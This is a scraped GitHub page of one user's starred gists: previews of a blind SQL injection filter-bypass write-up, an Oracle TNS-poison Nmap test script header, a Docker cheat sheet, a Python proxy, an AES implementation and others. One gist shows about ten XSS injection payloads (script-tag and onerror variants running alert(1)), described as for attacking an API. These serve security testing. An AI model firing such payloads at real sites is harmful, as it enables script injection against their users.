Skip to content

Instantly share code, notes, and snippets.

View bongbongco's full-sized avatar

LeeSeungyong bongbongco

34 followers · 55 following
View GitHub Profile
@stypr
stypr / README.md
Last active August 25, 2020 15:06
Blind SQLi 2018: Utilizing SQL standard to create payloads

There are several ways to bypass blind SQLi filters, and today I will introduce MySQL blind sqli payload using an insert() function.

Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.

This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ... ) are blocked by the script.

TL;DR

@CMCDragonkai
CMCDragonkai / memory_layout.md
Last active April 18, 2024 08:54
Linux: Understanding the Memory Layout of Linux Executables

Understanding the Memory Layout of Linux Executables

Required tools for playing around with memory:

  • hexdump
  • objdump
  • readelf
  • xxd
  • gcore
@JukArkadiy
JukArkadiy / oracle-tns-poison.nse
Last active August 3, 2020 00:39
Nmap script to test Oracle DB for "TNS poison vulnerability"
local bin = require "bin"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
description = [[
Simple module to test Oracle DB server for TNS Poison vulnerability.
Module sends to server a packet with command to register new TNS Listener and check response
@fronteer-kr
fronteer-kr / 기상청 격자 <-> 위경도 변환
Last active April 12, 2024 18:42
// 소스출처 : http://www.kma.go.kr/weather/forecast/digital_forecast.jsp 내부에 있음
// 기상청에서 이걸 왜 공식적으로 공개하지 않을까?
//
// (사용 예)
// var rs = dfs_xy_conv("toLL","60","127");
// console.log(rs.lat, rs.lng);
//
<script language="javascript">
//<!--
@nacyot
nacyot / docker_cheat.md
Last active March 21, 2024 11:11 — forked from wsargent/docker_cheat.md
도커(Docker) 치트 시트
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@gschizas
gschizas / pythonproxy.py
Created September 16, 2012 11:03
A python proxy in less than 100 lines of code
#!/usr/bin/python
# This is a simple port-forward / proxy, written using only the default python
# library. If you want to make a suggestion or fix something you can contact-me
# at voorloop_at_gmail.com
# Distributed over IDC(I Don't Care) license
# http://voorloopnul.com/blog/a-python-proxy-in-less-than-100-lines-of-code/
import socket
import select
import time
import sys
@jeetsukumaran
jeetsukumaran / rijndael.py
Created October 17, 2011 02:54
Pure-Python implementation of Rijndael (AES) cipher.
#############################################################################
# Original code ported from the Java reference code by Bram Cohen, April 2001,
# with the following statement:
#
# this code is public domain, unless someone makes
# an intellectual property claim against the reference
# code, in which case it can be made public domain by
# deleting all the comments and renaming all the variables
#
class Rijndael(object):